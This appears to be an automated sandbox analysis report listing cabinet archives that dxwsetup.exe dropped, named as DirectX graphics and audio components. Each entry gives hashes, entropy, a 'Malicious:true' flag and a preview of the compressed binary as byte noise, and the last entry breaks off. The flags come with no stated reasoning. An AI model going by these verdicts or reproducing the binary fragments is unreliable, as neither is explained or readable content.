                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..............=...X!........$;....D3DCompiler_42.dll.....X!....$;...D3DCompiler_42_x86.cat.!....;....$;...D3DCompiler_42_x86.inf.<....>....$;...D3DCompiler_42_x86_xp.inf.....4A....$;...AUG2009_D3DCompiler_42_x86.inf. ..$..CK.Zyx...?..P....%i..@.mh...,e.Y...5...&.!K).Pe.*........;**..zq.j...* ./..s./dR...=.}.....y.o....93I;.+X.c,.....-Ln..o.)z.<.m..F..e...s.|a....!w@...A=..jj(.T}A.j.j@.j..=...c...=...m.....m...m...6.h.o...[....m.h.k+...s<./F.R.'.<..7Vs...f*.......]..M...O6.NVD....o.{v..*.-.ub..........5..q."....V6..m..B._l..w...mI....j.S...mdlG.c..0.*U.p.. ..?.;"ZS..}?b\|...=.<...q...Wb.s..9..:.VG(......ExM.w.Mp.4.N..g...Vjg..7./\nG....Wyn..l.."..;..6...v....S....b1.Y...^..Sk..P....vRl.x..!.u..)Z(B.u.gQL.(...R0..../)>.x...<..d.3(..h.h.XE...."......}T.....(.S<O.(....(n......|......b&.....E.y....),.m{ml7.7..S.G.....[(.S..XE.L..Hc.L...6.w(vR|C...."......y.........M....o..-.....[.h.b....V4.I9...D.As..]h....).]

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_d3dx9_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DEC2006_d3dx9_32_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#.............................5.a .d3dx9_32_x64.cat...C.......}5.h .d3dx9_32.dll......<C....5T_ .infinst.exe.....'CD....5.` .d3dx9_32_x64.inf.&....ED....5.` .dec2006_d3dx9_32_x64.inf... .....[...J .*.M.P..%A.P...?..O..V..=Z!R._...DQ..E..ha.;.CZ.D.....u8h..A....."3DW4.......o........I...-.[...L..X...ns.xm..M...os.$.cu=.k...Y.=M<.m.'..y.5...k..K.....7.k.B.$.p!E ......bf....n1...4..........T...{.7..........]&.{l7.g..6-.M.k.-3.j]6......m.......<.M..... ...ibM.@..=.....1....@....!4..A..bIxR.3..=.|@i../....f..R NO..7.N..+....SJ..b5)......(.S..5U..6...hG..b..7.....Ye..yu....^`.+.A...x.wn..NI.......>Ld..+|.ij&.4o..2Q.r.$.....}&l...d...|K......_.+.aSP.>...6@A...)\..kL...R.....F.b$~.."...e.):n......^..7..:.3$h~G.EA.A:..8).i......U....L..*PU.....s..$...v.-.:.u..:.DM...Y.......].x...<.z...`y.K...)d.{`......:.c......w.k....?.wU@...r....~.T....j.wg......K./...&,...?......:g....bZ.K#..^<..?...}.q.r....9.;.2..Mh<

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FEB2007_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Preview:MSCF....+.......D................!..........+....#...................)........86v| .xact2_6_x64.cat..E...)....(6.{ .x3daudio1_1.dll.h....n....86w{ .xactengine2_6.dll.h...&p....869{ .infinst.exe...........86.{ .feb2007_xact_x64.inf...........86.{ .xact2_6_x64.inf.{4&.Z=..[.....0...R.P...>..s*.N{.....9..J<.....AZ.Q.PQT9'..E.I....R..(.T$..........w?.Z....Q.b......!-...&..2Un ...TCY.t(.07#..I. ..... 8...".7.... P.....F......-q..Y+."-/....}W.].......l2..]T.H@o..t..^..@1..Yd.2f.@d..?%....B.H.r.P....l$..d.3w....J...%^..!.Q..q...$...C."...t....LO....=...E..'.Pw@!...>...`...v..|Z>.?Sv~.Eb=........R.../.....A....h.....Q|.w.e.e;..h..7.P......}.?R]... ...=.."`...F.t}>0...>.../`!...>..8......W.+.a....!@.`d.....p.b.!}..4..ma%..<..+8.%X.....u....v...C.;iW...0.}"....h...|*/r......c_...Y.p.F(G..N......o..#....P........).(........+.;...O...iOK.,.........A.x.k.....~..l....@.$z.D....C=b....S..}.+....7... .~...n..%XM...c_.'..B........\.....0..?.7...m7~......n@..Q...Y......._.f

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Feb2006_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........C4.F .xact_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V....C4CE .xactengine2_0.dll.3.........C4iF .feb2006_xact_x86.inf...........C4iF .xact_x86.inf......8..CK.|.\....l...X.".....Y2..ET.$..dd.$.........'...*....1..|;.b....=D0._.........{....twuUuuuUMw.-..1RR...{.;u.2.0... U*..U.U....4....s.7.T.(tJ..*.0.^..S8KIU.dQ(tvCdL...'G........{..%n...r.&....T....P...m0.....1{x.a..;.<0+..0[..0..8.x.'.<...r.Pv.Z..l...p.0..f..G.n.J.N...}.9@i...07..V....:.....8.'[...p(u....%...~.T*...R....D.Z.....Q....m.Y......1...%bq..ng..M..M.8....\/....D....M...A.+...zaK...$.8...d.%u....&5..9.....k(#=9@.._..3Nm..M.7......s...f'....... .')..).N....=..!.....HrDg..6.t.z..KxT.^....0.H..P.....[..Vv..jg.:."p.........a.A$.` ..'..0.....dgAw.qCc.,.K.|@.t...t6....8t...m.[..Hl7..K...[.m#.Z....~.%{a.6..t`...z....F... ..u..yK..,y.V!o...W.;.y.t.k.D..p./.Q)T*{..>.k...<.=H.V....c#...*[LFEZ0]I.:.....S...'..%s<.R.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JUN2007_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........*........).........6.. .xact2_8_x64.cat.hS...).....6.. .x3daudio1_2.dll.hA..*}.....6". .xactengine2_8.dll.h..........6.. .infinst.exe............6.. .jun2007_xact_x64.inf............6.. .xact2_8_x64.inf.%..........6.. .xact2_8_x64_xp.inf.g@../..[.........R.P...?...XZ.R+...k...h...T.N.B..)...HX.F...J.V..Ty......hD......}.Q.I..lb...^.+..v.;.U.F..i.-.....4........B.$._H...@`................P..7.....,$0...Z/...1+.#.*......tAK.....^.$:.. .G..ma.....B.:<Lv!..p....I...a.A.C$.:....I..$?..I8T-u....o......1,"(CA.....!.(I@.yB......W..@.<3.!.(....1u!........@..y<....@d....2?I..d.ax.....@..WA.2..\....S...z........8.|..'......yD.y...............A'$..A(8.H3'S.#>.P...@..f.8....._..`...(f.'?T....Q..Y.Y.Es..............u(..@...'..zu ...?."(.v.. .=..p%.~..X.;.........g.......+...O...P\\....Y....~H......yd....u.v~y .... .z.B.*...0...! "..b7/..v..J...{...A...~.!y..O=...sR.Uy..>..$L$0.&2`.p..2M.v} p'l...*.....w....'..}.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2005_d3dx9_26_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Preview:MSCF....zK......D...........................zK...#..............v...7..........2b} .d3dx9_26_x64.cat..|9.7......2]| .d3dx9_26.dll.......9....20| .infinst.exe......:....2.} .d3dx9_26_x64.inf.&...r.:....2.} .jun2005_d3dx9_26_x64.inf.XW&..8..[.... 6.q.....#Q.P...M.$=\7....O.m...D..)j......J.W."...z...B.........<$]@.f.hf....../..K....(`.P.. ....d}.U....rW.q...U..z.3)K....Zl.cI.Fm..7..D.AS..* .H.25@........1....0n(....vs.].mJ..0...Q.A.....c.+P>......O..3)s".N..!..L..':....B.L...h)s.`.U......L....Bzj..%...H2r..J..rP.~.a..T.[.Oc...N!(0..P.B....|Ih...5...A.|.a...,.x.Qa<..~aCT...@...|.G1!|.|!..I..".. z..........S..C..Q.O....x..>...e..C..7.l1l ...@.YD...~L{.)......f..T.Y{...R.!a.}.hAs5..o9..4.w.#.........?|..+.$.r...KG........Q<.KR.....%....W:..8.....ET..>D.[T(..?....I.R3...W...4..C|....v..0.....`.e.Fp|>.<+Q..-..QS/.p.).qZ....GsV.f..PN"5..P>.K..e.Q.~..A...3|..E...D&N:.%...O.......^cc...O.........s.].=,#.je..No.........G..x..#.xg..D.s..}.L.`..|....N`.N......&W..P..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2007_d3dx9_34_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2008_d3dx9_38_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2010_d3dcsx_43_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............:...`..........<!]..d3dcsx_43.dll.....`......<B'..d3dcsx_43_x86.cat...........<.&..d3dcsx_43_x86.inf.(..........<.&..d3dcsx_43_x86_xp.inf.c..........<.&..JUN2010_d3dcsx_43_x86.inf.UR.....CK.{t.e.....6.I.Zp....a/.v.U#.Hi.%..V.f......&[(. .R..l.Tm4VA..."..-JA.Z.@....J.....x.....$.|..y|....fv7..._..wf.-.N.QJ..z.......Q.....<aG....=5.K...,......^.....]]....`..`GWp.9........S..c...>9kG.P.M...\......^O..[:.7.5..s.....|.........#.|.....TS.Xu0.....W.5.J...G....{.....*8.E...J.:B..l...9...........E..Q..'8j.....u.a.V.T.$Y.....O.V*..?.HW.._..........rMiA..g.;r....M'.Iy>9Z...!Y.sF.'......<.}..<......X....o;5..T.,..g.3|.....\....QOK.#5 .Vj....3."R'J...z.Q......n..R}R.K.J.:Ej..*.uHj..CR;.6K...>...QWK.Im..U.A.g...'.N..J.,..j.:Kj.....R.H]..Nj.TV~6#.Tj.T.T...R.R..;j...R.H.H....|.5..'.d...z.kU.eR....z..d....*...PO.6..J....ZT...t8T..d...D8.ji2.Lf$..lGw....7^s............k.j.q/...\.f..}ek'....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2007_d3dx9_36_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2008_d3dx9_40_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\OCT2006_d3dx9_31_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
